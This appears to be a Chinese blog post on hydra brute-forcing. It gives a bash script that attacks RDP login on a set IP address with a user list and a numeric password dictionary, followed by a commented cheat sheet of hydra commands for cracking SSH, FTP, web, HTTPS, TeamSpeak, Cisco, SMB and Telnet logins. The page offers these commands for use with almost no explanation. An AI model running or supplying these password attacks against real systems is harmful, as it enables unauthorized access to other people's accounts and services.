hydra 暴力破解

#!/bin/bash


IP=192.168.0.1

Users=/server/hack/password/users

Password=/server/hack/password/dict/0-9.8位純數密碼.txt

Log=/server/hack/log/$IP.log


#爆破3389端口終端登錄的帳號和密碼 協議:rdp

hydra $IP rdp -L $Users -P $Password -o $Log -f -V 


#破解ssh:

#hydra -L users.txt -P password.txt -t 1 -vV -e ns 192.168.1.104 ssh


#使用 -o 選項指定結果輸出文件。

#hydra -l xk -P /server/sh/pass.txt -t 1 -vV -e ns -o /server/log/save.log 192.168.7.254 rdp


# 破解ftp:

# hydra ip ftp -l 用戶名 -P 密碼字典 -t 線程(默認16) -vV

# hydra ip ftp -l 用戶名 -P 密碼字典 -e ns -vV


#get方式提交,破解web登錄:

# hydra -l 用戶名 -p 密碼字典 -t 線程 -vV -e ns ip http-get /admin/

# hydra -l 用戶名 -p 密碼字典 -t 線程 -vV -e ns -f ip http-get /admin/index.php


#破解https:

# hydra -m /index.php -l muts -P pass.txt 10.36.16.18 https


#破解teamspeak:

# hydra -l 用戶名 -P 密碼字典 -s 端口號 -vV ip teamspeak


#破解cisco:

# hydra -P pass.txt 10.36.16.18 cisco

# hydra -m cloud -P pass.txt 10.36.16.18 cisco-enable



#破解smb:

# hydra -l administrator -P pass.txt 10.36.16.18 smb


#破解telnet -f在使用-M參數以後,找到第一對登錄名或者密碼的時候中止破解

# hydra ip telnet -l 用戶 -P 密碼字典 -t 32 -s 23 -e ns -f -V


發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章